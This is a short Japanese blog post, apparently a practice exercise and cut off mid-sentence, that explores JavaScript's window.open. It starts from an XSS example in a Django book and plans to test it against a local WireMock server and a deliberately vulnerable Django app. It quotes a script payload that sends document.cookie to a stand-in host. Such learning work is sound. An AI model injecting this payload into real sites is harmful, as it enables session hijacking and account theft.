はじめに 豊洲ユナイテッドシネマ埋めるぞ!(ミリアニはいいぞ) nikkieです。 今回は小さな素振り記事です。 目次 はじめに 目次 window.open 開発ツールで動作確認 openする先のWireMockを用意 XSS脆弱性のあるDjangoアプリにopenを埋め込む 終わりに window.open 『実践Django』のXSS脆弱性の例で知りました。 openを使ってクッキーを送信するコードが実行される例が紹介されます(Kindle版 p.297 より)。 <script>open('http://example.com/stole?cookie='+escape(document.cookie));</script> このopen関数自体がよく分かっていなかったので今回素振りしました。 open() は Window インターフェイスのメソッドで、指定されたリソースを、新し